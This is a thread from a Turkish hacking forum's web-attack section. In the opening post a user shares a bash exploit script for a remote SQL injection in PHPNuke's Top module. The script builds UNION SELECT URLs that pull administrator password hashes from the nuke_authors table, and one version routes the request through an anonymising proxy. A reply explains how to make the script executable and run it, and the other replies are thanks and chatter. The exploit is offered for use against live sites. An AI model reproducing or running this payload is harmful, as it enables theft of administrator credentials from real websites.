folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Phpnuke 6.X Ve 7.6Top Module Remote SQL Injection



Phpnuke 6.X Ve 7.6Top Module Remote SQL Injection

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    istanbullu
    istanbullu's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek
    saldırgan çalştırdığı scriple uzakdan sql e bağlantı sağlanabiliyor ve admin exploit test edildi phpNuke bu sürümleri

    expolit:


    #/bin/bash

    # This is just basic-ly modules.php?name=Top&querylang=union%20select%200, pwd,0,0%20from%20nuke _authors%20where%20radminsuper=1
    # works thou /str0ke

    #
    # # by Fabrizi Andrea 2005
    # andrea.fabrizi [at] gmail.com
    #
    # Work with the PHPNuke latest version!
    #

    URL=$1;
    PATH="$2/";
    ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";

    echo -e "\n PHPNuke Top Module Remote SQL Injection"
    echo -e " by Fabrizi Andrea 2005"

    if [ "$URL" = "" ]; then
    echo -e "\n USAGE: $0 [url] [NukePath]"
    echo -e " Example: $0 www.site.net phpNuke\n"
    exit
    fi;

    if [ $PATH = "/" ]; then PATH=""; fi;
    #anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20wher e%20radminsuper=1";
    anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20sele ct%200,pwd,0,0%20from%20nuke _authors%20where%20radminsuper=1"; #changed line /str0ke

    #query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20wher e%20radminsuper=1";
    query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20sele ct%200,pwd,0,0%20from%20nuke _authors%20where%20radminsuper=1"; #changed line /str0ke

    echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
    echo -e " - Direct Query URL: " $query_url "\n";
    echo -e " - If this version of PHPNuke is vurnerable you can see the Admin’s Passwords Hashes at the end of ’Most voted polls’ List!\n"

    bilmeyen arkadaşlarım isterse açıklama yaparım, gerekirse videoda hazırlarız :)

    bu hayatin taaaaa a.q.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fcuk
    Fcuk's avatar
    Kayıt Tarihi: 09/Eylül/2005
    Erkek
    istanbullu senin nickin altındaki çömlüğü silelim ya söyleyelim de silinsin sen daha ilk günden foruma abandın :) yalnız ilk gün abanıp bırakma ;)

    Hoop.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek
    Tabi bunu kullanmak için linux kullanmanız gerekiyor :) Kullananlar varsa bir komut calıstırmaları gerekiyor exploit'i kullanmadan once. Exploiti kaydettikten sonra;

    $ chmod +x exploitadi
    $ ./exploit

    yaparak calıstırabilirsiniz.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    istanbullu
    istanbullu's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek
    eyw.aga bildiklerimizi ve gördüklerimizi paylaşıyoruz (çoğu alıntı gerçi) maksat daha tecrübesiz arkadaşlara yardımcı olmak. Hem merak etme nasıl başladıysak öyle devam ederiz ;)

    bu hayatin taaaaa a.q.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    servey_karen
    servey_karen's avatar
    Kayıt Tarihi: 02/Ağustos/2005
    Erkek
    tşk iyi güzel paylaşım alıntı olduğu biliniyordu zaten

    servey
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aga_4455
    aga_4455's avatar
    Kayıt Tarihi: 21/Eylül/2005
    Erkek
    tşk ler saol ya ben bi site kuracam bana yardım eden yarmı php nuke ile ilgili

    imza yok mühür bassak..
Toplam Hit: 1173 Toplam Mesaj: 6